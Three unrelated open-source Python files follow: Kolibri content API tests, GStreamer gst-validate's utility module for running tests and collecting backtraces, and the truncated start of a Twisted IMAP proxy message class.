kwargs={'pk': data["id"]}), get_params) self.assertEqual(response.data['total_resources'], 1) self.assertEqual(response.data['total_file_size'], 0) self.assertEqual(response.data['on_device_resources'], 4) self.assertEqual(response.data['on_device_file_size'], 0) def test_channelmetadata_langfield(self): data = content.ChannelMetadata.objects.first() root_lang = content.Language.objects.get(pk=1) data.root.lang = root_lang data.root.save() response = self.client.get(self._reverse_channel_url("channel-detail", {'pk': data.id})) self.assertEqual(response.data['lang_code'], root_lang.lang_code) self.assertEqual(response.data['lang_name'], root_lang.lang_name) def test_channelmetadata_langfield_none(self): data = content.ChannelMetadata.objects.first() response = self.client.get(self._reverse_channel_url("channel-detail", {'pk': data.id})) self.assertEqual(response.data['lang_code'], None) self.assertEqual(response.data['lang_name'], None) def test_channelmetadata_content_available_param_filter_lowercase_true(self): response = self.client.get(reverse("channel-list"), {"available": "true"}) self.assertEqual(response.data[0]["id"], "6199dde695db4ee4ab392222d5af1e5c") def test_channelmetadata_content_available_param_filter_uppercase_true(self): response = self.client.get(reverse("channel-list"), {"available": True}) self.assertEqual(response.data[0]["id"], "6199dde695db4ee4ab392222d5af1e5c") def test_channelmetadata_content_unavailable_param_filter_false(self): content.ContentNode.objects.filter(title="root").update(available=False) response = self.client.get(reverse("channel-list"), {"available": False}) self.assertEqual(response.data[0]["id"], "6199dde695db4ee4ab392222d5af1e5c") def test_channelmetadata_content_available_field_true(self): response = self.client.get(reverse("channel-list")) self.assertEqual(response.data[0]["available"], True) def test_channelmetadata_content_available_field_false(self): content.ContentNode.objects.filter(title="root").update(available=False) response = self.client.get(reverse("channel-list")) self.assertEqual(response.data[0]["available"], False) def test_channelmetadata_include_fields_filter_has_total_resources(self): response = self.client.get(reverse("channel-list"), {'include_fields': 'total_resources'}) self.assertEqual(response.data[0]["total_resources"], 1) def test_channelmetadata_include_fields_filter_has_total_file_size(self): content.LocalFile.objects.filter(files__contentnode__channel_id=self.the_channel_id).update(file_size=1) response = self.client.get(reverse("channel-list"), {'include_fields': 'total_file_size'}) self.assertEqual(response.data[0]["total_file_size"], 2) def test_channelmetadata_include_fields_filter_has_on_device_resources(self): response = self.client.get(reverse("channel-list"), {'include_fields': 'on_device_resources'}) self.assertEqual(response.data[0]["on_device_resources"], 5) def test_channelmetadata_include_fields_filter_has_on_device_file_size(self): content.LocalFile.objects.filter(files__contentnode__channel_id=self.the_channel_id).update(file_size=1) response = self.client.get(reverse("channel-list"), {'include_fields': 'on_device_file_size'}) self.assertEqual(response.data[0]["on_device_file_size"], 4) def test_channelmetadata_include_fields_filter_has_no_on_device_file_size(self): content.LocalFile.objects.filter(files__contentnode__channel_id=self.the_channel_id).update(available=True) response = self.client.get(reverse("channel-list"), {'include_fields': 'total_resources,total_file_size,on_device_resources,on_device_file_size'}) self.assertEqual(response.data[0]["on_device_file_size"], 0) @mock.patch.object(kolibri.content.serializers, 'renderable_contentnodes_without_topics_q_filter', Q(kind="dummy")) def test_channelmetadata_include_fields_filter_has_no_renderable_on_device_file_size(self): content.LocalFile.objects.filter(files__contentnode__channel_id=self.the_channel_id).update(file_size=1) response = self.client.get(reverse("channel-list"), {'include_fields': 'on_device_file_size'}) self.assertEqual(response.data[0]["on_device_file_size"], 4) def test_channelmetadata_has_exercises_filter(self): # Has nothing else for that matter... no_exercise_channel = content.ContentNode.objects.create( pk="6a406ac66b224106aa2e93f73a94333d", channel_id="f8ec4a5d14cd4716890999da596032d2", content_id="ded4a083e75f4689b386fd2b706e792a", kind="topic", title="no exercise channel", ) content.ChannelMetadata.objects.create( id="63acff41781543828861ade41dbdd7ff", name="no exercise channel metadata", root=no_exercise_channel, ) no_filter_response = self.client.get(reverse("channel-list")) self.assertEqual(len(no_filter_response.data), 2) with_filter_response = self.client.get(reverse("channel-list"), {"has_exercise": True}) self.assertEqual(len(with_filter_response.data), 1) self.assertEqual(no_filter_response.data[0]["name"], "testing") def test_file_list(self): response = self.client.get(self._reverse_channel_url("file-list")) self.assertEqual(len(response.data), 5) def test_file_retrieve(self): response = self.client.get(self._reverse_channel_url("file-detail", {'pk': "6bdfea4a01830fdd4a585181c0b8068c"})) self.assertEqual(response.data['preset'], 'High Resolution') def _setup_contentnode_progress(self): # set up data for testing progress_fraction field on content node endpoint facility = Facility.objects.create(name="MyFac") user = FacilityUser.objects.create(username="learner", facility=facility) user.set_password("pass") user.save() root = content.ContentNode.objects.get(title="root") c1 = content.ContentNode.objects.get(title="c1") c2 = content.ContentNode.objects.get(title="c2") c2c1 = content.ContentNode.objects.get(title="c2c1") c2c3 = content.ContentNode.objects.get(title="c2c3") for node, progress in [(c2c1, 0.7), (c2c3, 0.5)]: ContentSummaryLog.objects.create( user=user, content_id=node.content_id, progress=progress, channel_id=self.the_channel_id, start_timestamp=datetime.datetime.now() ) return facility, root, c1, c2, c2c1, c2c3 def test_contentnode_progress(self): facility, root, c1, c2, c2c1, c2c3 = self._setup_contentnode_progress() def assert_progress(node, progress): response = self.client.get(self._reverse_channel_url("contentnode-detail", {'pk': node.id})) self.assertEqual(response.data["progress_fraction"], progress) # check that there is no progress when not logged in assert_progress(root, 0) assert_progress(c1, 0) assert_progress(c2, 0) assert_progress(c2c1, 0) # check that progress is calculated appropriately when user is logged in self.client.login(username="learner", password="pass", facility=facility) # Topic so None assert_progress(root, None) assert_progress(c1, None) # Topic so None assert_progress(c2, None) assert_progress(c2c1, 0.7) def test_contentnode_progress_detail_endpoint(self): facility, root, c1, c2, c2c1, c2c3 = self._setup_contentnode_progress() def assert_progress(node, progress): response = self.client.get(self._reverse_channel_url("contentnodeprogress-detail", {'pk': node.id})) self.assertEqual(response.data["progress_fraction"], progress) # check that there is no progress when not logged in assert_progress(root, 0) assert_progress(c1, 0) assert_progress(c2, 0) assert_progress(c2c1, 0) # check that progress is calculated appropriately when user is logged in self.client.login(username="learner", password="pass", facility=facility) # The progress endpoint is used, so should report progress for topics assert_progress(root, 0.24) assert_progress(c1, 0) assert_progress(c2, 0.4) assert_progress(c2c1, 0.7) def test_contentnode_progress_list_endpoint(self): facility, root, c1, c2, c2c1, c2c3 = self._setup_contentnode_progress() response = self.client.get(self._reverse_channel_url("contentnodeprogress-list")) def get_progress_fraction(node): return list(filter(lambda x: x['pk'] == node.pk, response.data))[0]['progress_fraction'] # check that there is no progress when not logged in self.assertEqual(get_progress_fraction(root), 0) self.assertEqual(get_progress_fraction(c1), 0) self.assertEqual(get_progress_fraction(c2), 0) self.assertEqual(get_progress_fraction(c2c1), 0) # check that progress is calculated appropriately when user is logged in self.client.login(username="learner", password="pass", facility=facility) response = self.client.get(self._reverse_channel_url("contentnodeprogress-list")) # The progress endpoint is used, so should report progress for topics self.assertEqual(get_progress_fraction(root), 0.24) self.assertEqual(get_progress_fraction(c1), 0) self.assertEqual(get_progress_fraction(c2), 0.4) self.assertEqual(get_progress_fraction(c2c1), 0.7) @mock.patch.object(cache, 'set') def test_parent_query_cache_is_set(self, mock_cache_set): id = content.ContentNode.objects.get(title="c3").id self.client.get(self._reverse_channel_url("contentnode-list"), data={"parent": id}) self.assertTrue(mock_cache_set.called) @mock.patch.object(cache, 'set') def test_parent_query_cache_not_set(self, mock_cache_set): id = content.ContentNode.objects.get(title="c2c3").id self.client.get(self._reverse_channel_url("contentnode-list"), data={"parent": id, 'kind': content_kinds.EXERCISE}) self.assertFalse(mock_cache_set.called) def test_parent_query_cache_hit(self): id = content.ContentNode.objects.get(title="c2c3").id self.client.get(self._reverse_channel_url("contentnode-list"), data={"parent": id}) with mock.patch.object(cache, 'set') as mock_cache_set: self.client.get(self._reverse_channel_url("contentnode-list"), data={"parent": id}) self.assertFalse(mock_cache_set.called) def test_filtering_coach_content_anon(self): response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"by_role": True}) # TODO make content_test.json fixture more organized. Here just, hardcoding the correct count self.assertEqual(len(response.data), 7) def test_filtering_coach_content_admin(self): self.client.login(username=self.admin.username, password=DUMMY_PASSWORD) response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"by_role": True}) expected_output = content.ContentNode.objects.exclude(available=False).count() # coach_content node should be returned self.assertEqual(len(response.data), expected_output) def _setup_lesson(self): facility = Facility.objects.create(name="MyFac") admin = FacilityUser.objects.create(username="admin", facility=facility) admin.set_password(DUMMY_PASSWORD) admin.save() nodes = [] nodes.append(content.ContentNode.objects.get(title='c3c1')) nodes.append(content.ContentNode.objects.get(title='c2c3')) nodes.append(content.ContentNode.objects.get(title='c2c2')) json_resource = [{"contentnode_id": node.id, "content_id": node.content_id, "channel_id": node.channel_id} for node in nodes] lesson = Lesson.objects.create( title="title", is_active=True, collection=facility, created_by=admin, resources=json_resource ) return lesson, nodes def test_in_lesson_filter(self): lesson, nodes = self._setup_lesson() response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"in_lesson": lesson.id}) self.assertEqual(len(response.data), len(lesson.resources)) for counter, node in enumerate(nodes): self.assertEqual(response.data[counter]['id'], node.id) def test_in_lesson_filter_invalid_value(self): self._setup_lesson() # request with invalid uuid response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"in_lesson": '123'}) self.assertEqual(len(response.data), 0) # request with valid uuid response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"in_lesson": '47385a6d4df3426db38ad0d20e113dce'}) self.assertEqual(len(response.data), 0) def _setup_exam(self): facility = Facility.objects.create(name="MyFac") admin = FacilityUser.objects.create(username="admin", facility=facility) admin.set_password(DUMMY_PASSWORD) admin.save() node = content.ContentNode.objects.get(title='c3c1') exam = Exam.objects.create( title="title", channel_id="test", question_count=1, active=True, collection=facility, creator=admin, question_sources=[ {"exercise_id": node.id, "number_of_questions": 6} ] ) return exam, node def test_in_exam_filter(self): exam, node = self._setup_exam() response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"in_exam": exam.id}) self.assertEqual(len(response.data), len(exam.question_sources)) self.assertEqual(response.data[0]['id'], node.id) def test_in_exam_filter_invalid_value(self): self._setup_exam() # request with invalid uuid response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"in_exam": '123'}) self.assertEqual(len(response.data), 0) # request with valid uuid response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"in_exam": '47385a6d4df3426db38ad0d20e113dce'}) self.assertEqual(len(response.data), 0) def test_copies(self): # the pk is actually a content id response = self.client.get(reverse('contentnode-copies', kwargs={'pk': 'c6f49ea527824f398f4d5d26faf19396'})) expected_titles = set(['root', 'c1', 'copy']) response_titles = set() for node in response.data[0]: response_titles.add(node['title']) self.assertSetEqual(expected_titles, response_titles) def test_available_copies(self): # the pk is actually a content id response = self.client.get(reverse('contentnode-copies', kwargs={'pk': 'f2332710c2fd483386cdeb5dcbdda81a'})) # no results should be returned for unavailable content node self.assertEqual(len(response.data), 0) def test_copies_count(self): response = self.client.get(reverse('contentnode-copies-count'), data={'content_ids': 'f2332710c2fd483386cdeb5dcbdda81f,c6f49ea527824f398f4d5d26faf15555,f2332710c2fd483386cdeb5dcbdda81a'}) # assert non existent content id does not show up in results # no results should be returned for unavailable content node self.assertEqual(len(response.data), 1) self.assertEqual(response.data[0]['count'], content.ContentNode.objects.filter(content_id='f2332710c2fd483386cdeb5dcbdda81f').count()) def test_search(self): # ensure search works when there are no words not defined response = self.client.get(reverse('contentnode-list'), data={'search': '!?,'}) self.assertEqual(len(response.data), 0) # ensure search words when there is only stopwords response = self.client.get(reverse('contentnode-list'), data={'search': 'or'}) self.assertEqual(len(response.data), 0) # regular search response = self.client.get(reverse('contentnode-list'), data={'search': 'root'}) self.assertEqual(len(response.data), 1) def _create_session_logs(self): content_ids = ('f2332710c2fd483386cdeb5ecbdda81f', 'ce603df7c46b424b934348995e1b05fb', '481e1bda1faa445d801ceb2afbd2f42f') channel_id = '6199dde695db4ee4ab392222d5af1e5c' [ContentSessionLog.objects.create(channel_id=channel_id, content_id=content_ids[0], start_timestamp=timezone.now(), kind='audio') for _ in range(50)] [ContentSessionLog.objects.create(channel_id=channel_id, content_id=content_ids[1], start_timestamp=timezone.now(), kind='exercise') for _ in range(25)] [ContentSessionLog.objects.create(channel_id=channel_id, content_id=content_ids[2], start_timestamp=timezone.now(), kind='document') for _ in range(1)] # create log for non existent content id # should not show up in api response ContentSessionLog.objects.create(channel_id=uuid.uuid4().hex, content_id=uuid.uuid4().hex, start_timestamp=timezone.now(), kind='content') return content_ids def test_popular(self): expected_content_ids = self._create_session_logs() response = self.client.get(reverse('contentnode-list'), data={'popular': uuid.uuid4().hex}) response_content_ids = set(node['content_id'] for node in response.json()) self.assertSetEqual(set(expected_content_ids), response_content_ids) def _create_summary_logs(self): facility = Facility.objects.create(name="MyFac") user = FacilityUser.objects.create(username="user", facility=facility) content_ids = ('f2332710c2fd483386cdeb5ecbdda81f',) channel_id = '6199dde695db4ee4ab392222d5af1e5c' ContentSummaryLog.objects.create(channel_id=channel_id, content_id=content_ids[0], user_id=user.id, start_timestamp=timezone.now(), kind='audio') # create log with progress of 1 # should not show up in api response ContentSummaryLog.objects.create(channel_id=channel_id, content_id='ce603df7c46b424b934348995e1b05fb', user_id=user.id, progress=1, start_timestamp=timezone.now(), kind='audio') # create log for non existent content id # should not show up in api response ContentSummaryLog.objects.create(channel_id=uuid.uuid4().hex, content_id=uuid.uuid4().hex, user_id=user.id, start_timestamp=timezone.now(), kind='content') return user, content_ids def test_resume(self): user, expected_content_ids = self._create_summary_logs() response = self.client.get(reverse('contentnode-list'), data={'resume': user.id}) response_content_ids = set(node['content_id'] for node in response.json()) self.assertSetEqual(set(expected_content_ids), response_content_ids) def tearDown(self): """ clean up files/folders created during the test """ cache.clear() super(ContentNodeAPITestCase, self).tearDown() def mock_patch_decorator(func): def wrapper(*args, **kwargs): mock_object = mock.Mock() mock_object.json.return_value = [{'id': 1, 'name': 'studio'}] with mock.patch.object(requests, 'get', return_value=mock_object): return func(*args, **kwargs) return wrapper class KolibriStudioAPITestCase(APITestCase): def setUp(self): DeviceSettings.objects.create(is_provisioned=True) self.facility = Facility.objects.create(name='facility') superuser = FacilityUser.objects.create(username='superuser', facility=self.facility) superuser.set_password(DUMMY_PASSWORD) superuser.save() DevicePermissions.objects.create(user=superuser, is_superuser=True) self.client.login(username=superuser.username, password=DUMMY_PASSWORD) @mock_patch_decorator def test_channel_list(self): response = self.client.get(reverse('remotechannel-list'), format='json') self.assertEqual(response.data[0]['id'], 1) @mock_patch_decorator def test_no_permission_non_superuser_channel_list(self): user = FacilityUser.objects.create(username='user', facility=self.facility) user.set_password(DUMMY_PASSWORD) user.save() self.client.logout() self.client.login(username=user.username, password=DUMMY_PASSWORD) response = self.client.get(reverse('remotechannel-list'), format='json') self.assertEqual(response.status_code, 403) @mock_patch_decorator def test_channel_retrieve(self): response = self.client.get(reverse('remotechannel-detail', kwargs={'pk': 'abc'}), format='json') self.assertEqual(response.data[0]['name'], 'studio') @mock_patch_decorator def test_channel_info_cache(self): self.client.get(reverse('remotechannel-detail', kwargs={'pk': 'abc'}), format='json') with mock.patch.object(cache, 'set') as mock_cache_set: self.client.get(reverse('remotechannel-detail', kwargs={'pk': 'abc'}), format='json') self.assertFalse(mock_cache_set.called) @mock_patch_decorator def test_channel_info_404(self): mock_object = mock.Mock() mock_object.status_code = 404 requests.get.return_value = mock_object response = self.client.get(reverse('remotechannel-detail', kwargs={'pk': 'abc'}), format='json') self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND) def tearDown(self): cache.clear()
#!/usr/bin/env python3 # # Copyright (c) 2013,Thibault Saunier <thibault.saunier@collabora.com> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this program; if not, write to the # Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, # Boston, MA 02110-1301, USA. """ Some utilies. """ try: import config except ImportError: from . import config import os import platform import re import shutil import shlex import signal import subprocess import sys import tempfile import time import urllib.request import urllib.error import urllib.parse from .loggable import Loggable from operator import itemgetter from xml.etree import ElementTree GST_SECOND = int(1000000000) DEFAULT_TIMEOUT = 30 DEFAULT_MAIN_DIR = os.path.join(os.path.expanduser("~"), "gst-validate") DEFAULT_GST_QA_ASSETS = os.path.join( DEFAULT_MAIN_DIR, "gst-integration-testsuites") DISCOVERER_COMMAND = "gst-discoverer-1.0" # Use to set the duration from which a test is considered as being 'long' LONG_TEST = 40 class Result(object): NOT_RUN = "Not run" FAILED = "Failed" TIMEOUT = "Timeout" PASSED = "Passed" SKIPPED = "Skipped" KNOWN_ERROR = "Known error" class Protocols(object): HTTP = "http" FILE = "file" HLS = "hls" DASH = "dash" RTSP = "rtsp" @staticmethod def needs_clock_sync(protocol): if protocol in [Protocols.HLS, Protocols.DASH]: return True return False def supports_ansi_colors(): platform = sys.platform supported_platform = platform != 'win32' or 'ANSICON' in os.environ # isatty is not always implemented, #6223. is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty() if not supported_platform or not is_a_tty: return False return True class Colors(object): HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' def desactivate_colors(): Colors.HEADER = '' Colors.OKBLUE = '' Colors.OKGREEN = '' Colors.WARNING = '' Colors.FAIL = '' Colors.ENDC = '' if not supports_ansi_colors(): desactivate_colors() def mkdir(directory): try: os.makedirs(directory) except os.error: pass def which(name, extra_path=None): exts = [_f for _f in os.environ.get('PATHEXT', '').split(os.pathsep) if _f] path = os.environ.get('PATH', '') if extra_path: path = extra_path + os.pathsep + path if not path: return [] for p in path.split(os.pathsep): p = os.path.join(p, name) if os.access(p, os.X_OK): return p for e in exts: pext = p + e if os.access(pext, os.X_OK): return pext return None def get_color_for_result(result): if result is Result.FAILED: color = Colors.FAIL elif result is Result.TIMEOUT: color = Colors.WARNING elif result is Result.PASSED: color = Colors.OKGREEN else: color = Colors.OKBLUE return color def printc(message, color="", title=False, title_char=''): if title or title_char: length = 0 for l in message.split("\n"): if len(l) > length: length = len(l) if length == 0: length = len(message) if title is True: message = length * "=" + "\n" + str(message) + "\n" + length * '=' else: message = str(message) + "\n" + length * title_char if hasattr(message, "result") and color == '': color = get_color_for_result(message.result) sys.stdout.write(color + str(message) + Colors.ENDC + "\n") sys.stdout.flush() def launch_command(command, color=None, fails=False): printc(command, Colors.OKGREEN, True) res = os.system(command) if res != 0 and fails is True: raise subprocess.CalledProcessError(res, "%s failed" % command) def path2url(path): return urllib.parse.urljoin('file:', urllib.request.pathname2url(path)) def is_windows(): platname = platform.system().lower() return platname == 'windows' or 'mingw' in platname def url2path(url): path = urllib.parse.urlparse(url).path if "win32" in sys.platform: if path[0] == '/': return path[1:] # We need to remove the first '/' on windows path = urllib.parse.unquote(path) return path def isuri(string): url = urllib.parse.urlparse(string) if url.scheme != "" and url.scheme != "": return True return False def touch(fname, times=None): with open(fname, 'a'): os.utime(fname, times) def get_subclasses(klass, env): subclasses = [] for symb in env.items(): try: if issubclass(symb[1], klass) and not symb[1] is klass: subclasses.append(symb[1]) except TypeError: pass return subclasses def TIME_ARGS(time): return "%u:%02u:%02u.%09u" % (time / (GST_SECOND * 60 * 60), (time / (GST_SECOND * 60)) % 60, (time / GST_SECOND) % 60, time % GST_SECOND) def look_for_file_in_source_dir(subdir, name): root_dir = os.path.abspath(os.path.dirname( os.path.join(os.path.dirname(os.path.abspath(__file__))))) p = os.path.join(root_dir, subdir, name) if os.path.exists(p): return p return None # Returns the path $top_src_dir/@subdir/@name if running from source, or # $DATADIR/gstreamer-1.0/validate/@name if not def get_data_file(subdir, name): # Are we running from sources? p = look_for_file_in_source_dir(subdir, name) if p: return p # Look in system data dirs p = os.path.join(config.DATADIR, 'gstreamer-1.0', 'validate', name) if os.path.exists(p): return p return None # # Some utilities to parse gst-validate output # # def gsttime_from_tuple(stime): return int((int(stime[0]) * 3600 + int(stime[1]) * 60 + int(stime[2])) * GST_SECOND + int(stime[3])) timeregex = re.compile(r'(?P<_0>.+):(?P<_1>.+):(?P<_2>.+)\.(?P<_3>.+)') def parse_gsttimeargs(time): stime = list(map(itemgetter(1), sorted( timeregex.match(time).groupdict().items()))) return int((int(stime[0]) * 3600 + int(stime[1]) * 60 + int(stime[2])) * GST_SECOND + int(stime[3])) def get_duration(media_file): duration = 0 res = '' try: res = subprocess.check_output( [DISCOVERER_COMMAND, media_file]).decode() except subprocess.CalledProcessError: # gst-media-check returns !0 if seeking is not possible, we do not care # in that case. pass for l in res.split('\n'): if "Duration: " in l: duration = parse_gsttimeargs(l.replace("Duration: ", "")) break return duration def get_scenarios(): GST_VALIDATE_COMMAND = "gst-validate-1.0" os.system("%s --scenarios-defs-output-file %s" % (GST_VALIDATE_COMMAND, )) class BackTraceGenerator(Loggable): __instance = None _command_line_regex = re.compile(r'Command Line: (.*)\n') _timestamp_regex = re.compile(r'Timestamp: .*\((\d*)s ago\)') _pid_regex = re.compile(r'PID: (\d+) \(.*\)') def __init__(self): Loggable.__init__(self) self.in_flatpak = os.path.exists("/usr/manifest.json") if self.in_flatpak: coredumpctl = ['flatpak-spawn', '--host', 'coredumpctl'] else: coredumpctl = ['coredumpctl'] try: subprocess.check_output(coredumpctl) self.coredumpctl = coredumpctl except Exception as e: self.warning(e) self.coredumpctl = None self.gdb = shutil.which('gdb') @classmethod def get_default(cls): if not cls.__instance: cls.__instance = BackTraceGenerator() return cls.__instance def get_trace(self, test): if not test.process.returncode: return self.get_trace_on_running_process(test) if self.coredumpctl: return self.get_trace_from_systemd(test) self.debug("coredumpctl not present, and it is the only" " supported way to get backtraces for now.") return None def get_trace_on_running_process(self, test): if not self.gdb: return "Can not generate stack trace as `gdb` is not" \ "installed." gdb = ['gdb', '-ex', 't a a bt', '-batch', '-p', str(test.process.pid)] try: return subprocess.check_output( gdb, stderr=subprocess.STDOUT, timeout=30).decode() except Exception as e: return "Could not run `gdb` on process (pid: %d):\n%s" % ( test.process.pid, e) def get_trace_from_systemd(self, test): for ntry in range(10): if ntry != 0: # Loopping, it means we conceder the logs might not be ready # yet. time.sleep(1) if not self.in_flatpak: coredumpctl = self.coredumpctl + ['info', str(test.process.pid)] else: newer_than = time.strftime("%a %Y-%m-%d %H:%M:%S %Z", time.localtime(test._starting_time)) coredumpctl = self.coredumpctl + ['info', os.path.basename(test.command[0]), '--since', newer_than] try: info = subprocess.check_output(coredumpctl, stderr=subprocess.STDOUT) except subprocess.CalledProcessError: # The trace might not be ready yet time.sleep(1) continue info = info.decode() try: pid = self._pid_regex.findall(info)[0] except IndexError: self.debug("Backtrace could not be found yet, trying harder.") continue command_line = BackTraceGenerator._command_line_regex.findall(info)[0] if shlex.split(command_line)[0] != test.application: self.debug("PID: %s -- executable %s != test application: %s" % ( pid, command_line[0], test.application)) # The trace might not be ready yet continue if not BackTraceGenerator._timestamp_regex.findall(info): self.debug("Timestamp %s is more than 1min old", re.findall(r'Timestamp: .*', info)) # The trace might not be ready yet continue bt_all = None if self.gdb: try: with tempfile.NamedTemporaryFile() as stderr: coredump = subprocess.check_output(self.coredumpctl + ['dump', pid], stderr=stderr) with tempfile.NamedTemporaryFile() as tf: tf.write(coredump) tf.flush() gdb = ['gdb', '-ex', 't a a bt', '-ex', 'quit', test.application, tf.name] bt_all = subprocess.check_output( gdb, stderr=subprocess.STDOUT).decode() info += "\nThread apply all bt:\n\n%s" % ( bt_all.replace('\n', '\n' + 15 * ' ')) except Exception as e: self.error("Could not get backtrace from gdb: %s" % e) return info return None def check_bugs_resolution(bugs_definitions): bugz = {} regexes = {} for regex, bugs in bugs_definitions: if isinstance(bugs, str): bugs = [bugs] for bug in bugs: url = urllib.parse.urlparse(bug) if "bugzilla" not in url.netloc: printc(" + %s \n --> bug: %s\n --> Status: Not a bugzilla report\n" % (regex, bug), Colors.WARNING) continue query = urllib.parse.parse_qs(url.query) _id = query.get('id') if not _id: printc(" + '%s' -- Can't check bug '%s'\n" % (regex, bug), Colors.WARNING) continue if isinstance(_id, list): _id = _id[0] regexes[_id] = (regex, bug) url_parts = tuple(list(url)[:3] + ['', '', '']) ids = bugz.get(url_parts, []) ids.append(_id) bugz[url_parts] = ids res = True for url_parts, ids in bugz.items(): url_parts = list(url_parts) query = {'id': ','.join(ids)} query['ctype'] = 'xml' url_parts[4] = urllib.parse.urlencode(query) try: res = urllib.request.urlopen(urllib.parse.urlunparse(url_parts)) except Exception as e: printc(" + Could not properly check bugs status for: %s (%s)\n" % (urllib.parse.urlunparse(url_parts), e), Colors.FAIL) continue root = ElementTree.fromstring(res.read()) bugs = root.findall('./bug') if len(bugs) != len(ids): printc(" + Could not properly check bugs status on server %s\n" % urllib.parse.urlunparse(url_parts), Colors.FAIL) continue for bugelem in bugs: status = bugelem.findtext('./bug_status') bugid = bugelem.findtext('./bug_id') regex, bug = regexes[bugid] desc = bugelem.findtext('./short_desc') if not status: printc(" + %s \n --> bug: %s\n --> Status: UNKNOWN\n" % (regex, bug), Colors.WARNING) continue if not status.lower() in ['new', 'verified']: printc(" + %s \n --> bug: #%s: '%s'\n ==> Bug CLOSED already (status: %s)\n" % ( regex, bugid, desc, status), Colors.WARNING) res = False printc(" + %s \n --> bug: #%s: '%s'\n --> Status: %s\n" % ( regex, bugid, desc, status), Colors.OKGREEN) return res def kill_subprocess(owner, process, timeout): if process is None: return stime = time.time() res = process.poll() waittime = 0.05 while res is None: try: owner.debug("Subprocess is still alive, sending KILL signal") if is_windows(): subprocess.call( ['taskkill', '/F', '/T', '/PID', str(process.pid)]) else: process.send_signal(signal.SIGKILL) time.sleep(waittime) waittime *= 2 except OSError: pass if time.time() - stime > DEFAULT_TIMEOUT: raise RuntimeError("Could not kill subprocess after %s second" " Something is really wrong, => EXITING" % DEFAULT_TIMEOUT) res = process.poll() return res
#|############################################################################## #|Copyright (c) 2009, The Green-Span Project. All rights reserved. This code is #|Open Source Free Software - redistribution and use in source and binary forms, #|with or without modification, are permitted under the Two Clause BSD License. #|############################################################################## #|File Created: 2009-04-03 #|Author(s): Sean Hastings, #|############################################################################## VERBOSE = True from globals import ALLVERBOSE from cStringIO import StringIO from twisted.mail import imap4 from zope.interface import implements class ImapProxyMessage(object): implements(imap4.IMessage) def __init__(self,minfo,mailbox): if ALLVERBOSE or VERBOSE: print "ImapProxyMessage.__init__" print minfo #initialize instance variables self.mailbox = mailbox #update/initialize others from messageinfo self.update(minfo) def update(self,minfo): """update message info from dictionary of structured message parts @type minfo: C{dict} @param minfo: Dictionarey of message parts formated like this: {'FLAGS': ['\\Seen', '\\Draft'], 'UID': '1', 'RFC822': 'FCC: imap://whysean@localhost/Sent\r\nX-Identity-Key: id1\r\nMessage-ID: <49DA2F1E.8000701@gmail.com>\r\nDate: Mon, 06 Apr 2009 12:34:38 -0400\r\nFrom: Green Span Test <green.span.test@gmail.com>\r\nX-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; uuencode=0\r\nUser-Agent: Thunderbird 2.0.0.21 (Windows/20090302)\r\nMIME-Version: 1.0\r\nTo: whysean@gmail.com\r\nSubject: test\r\nContent-Type: text/html; charset=ISO-8859-1\r\nContent-Transfer-Encoding: 7bit\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">\r\n<html>\r\n<head>\r\n</head>\r\n<body bgcolor="#ffffff" text="#000000">\r\ntest\r\n</body>\r\n</html>\r\n\r\n'} } @rtype: C(dict) @return: Dictionary mapping header names to values """ #{'UID': '1', 'RFC822': 'FCC: imap://whysean@localhost/Sent\r\nX-Identity-Key: id1\r\nMessage-ID: <49DA2F1E.8000701@gmail.com>\r\nDate: Mon, 06 Apr 2009 12:34:38 -0400\r\nFrom: Green Span Test <green.span.test@gmail.com>\r\nX-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; uuencode=0\r\nUser-Agent: Thunderbird 2.0.0.21 (Windows/20090302)\r\nMIME-Version: 1.0\r\nTo: whysean@gmail.com\r\nSubject: test\r\nContent-Type: text/html; charset=ISO-8859-1\r\nContent-Transfer-Encoding: 7bit\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">\r\n<html>\r\n<head>\r\n</head>\r\n<body bgcolor="#ffffff" text="#000000">\r\ntest\r\n</body>\r\n</html>\r\n\r\n'} if ALLVERBOSE or VERBOSE: print "ImapProxyMessage.update" print minfo self.uid = int(minfo['UID']) self.flags = minfo['FLAGS'] #split headers and body end_headers = minfo['RFC822'].find('\r\n\r\n') #first blank line indicates start of body self.raw_headers = minfo['RFC822'][:end_headers] self.body = minfo['RFC822'][(end_headers+4):] self.headers = self._parseHeaders(self.raw_headers) def _parseHeaders(self,raw_headers): """Returns parsed headers as dictionary @type rfc822: C{str} @param rfc822: The text of the message - headers are seperate by CRLF like this: 'FCC: imap://whysean@localhost/Sent\r\n X-Identity-Key: id1\r\n Message-ID: <49DA2F1E.8000701@gmail.com>\r\n Date: Mon, 06 Apr 2009 12:34:38 -0400\r\n From: Green Span Test <green.span.test@gmail.com>\r\n X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; uuencode=0\r\n User-Agent: Thunderbird 2.0.0.21 (Windows/20090302)\r\n MIME-Version: 1.0\r\n To: whysean@gmail.com\r\n Subject: test\r\n Content-Type: text/html; charset=ISO-8859-1\r\n Content-Transfer-Encoding: 7bit' @rtype: C(dict) @return: Dictionary mapping header names (cast to upper case) to values """ #Add standin for multiline headers (CrLf followed by space or tab) if ALLVERBOSE or VERBOSE: print "ImapProxyMessage['%s']._parseheaders" % self.uid print 